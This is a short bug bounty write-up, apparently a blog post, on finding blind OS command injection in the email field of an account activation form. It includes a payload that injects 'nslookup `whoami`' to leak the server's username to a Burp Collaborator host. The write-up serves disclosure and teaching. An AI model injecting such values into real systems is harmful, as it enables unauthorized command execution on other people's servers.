Blind OS Command Injection via Activation Request

3 min readMay 18


Hello everyone, in this article I’m going to share with you how I found Blind OS Command Injection vulnerability via account activation request.

Firstly, what is blind os command injection?

OS Command Injection

OS Command Injection is a web security vulnerability that allows an attacker to execute operating system (OS) command to the server. Indicated with response of request while injected with OS command like ping, echo, etc. Blind OS command injection is where the site is vulnerable but it doesn’t show us the response if target vulnerable. But still can detected with burp collaborator or a listener.

In my case, the vulnerability occurs in email and phone number fields of account activation request’s form when our trial account was expired.

PoC :

  • After login with expired account, I can’t access dashboard, instead the pop up alert with Email and Phone Number fields exists for buying their services.
Pop op that occurs for account activation request if our trial expired
  • Then I fill the email and phone number, then click Contact Me button to send activation request
  • In Burpsuite, I sent request history to the Repeater, like below
HTTP request for account activation
  • I’ve tried to inject os command like ping -c 10 to notice if response has time delay, but it’s not. Then I inject in emailAdrress value with this payload : & nslookup burpcollaborator_site_payload, burp collaborator site payload can generated with Right Click -> Insert Collaborator Payload, so it will looks like this :

“emailAddress”:” & nslookup `whoami`.BURP-COLLABORATOR-SUBDOMAIN &

after sent with payload
  • After sent the payload, nothing in the response indicates if it vulnerable, but go to Collaborator tab and click Poll now button, the payload was triggered
Payload nslookup was triggered

*** FYI : The target has bug bounty program but not in platform like Hackerone. I’ve reported it but until now I didn’t get response yet for 1 month. In their bug bounty policy page written that they will review a report for at least 3 weeks. Tried contact them but no answer. Previously I’ve reported XSS issue they responded but I got duplicate. :D , I can’t publish the target for now ***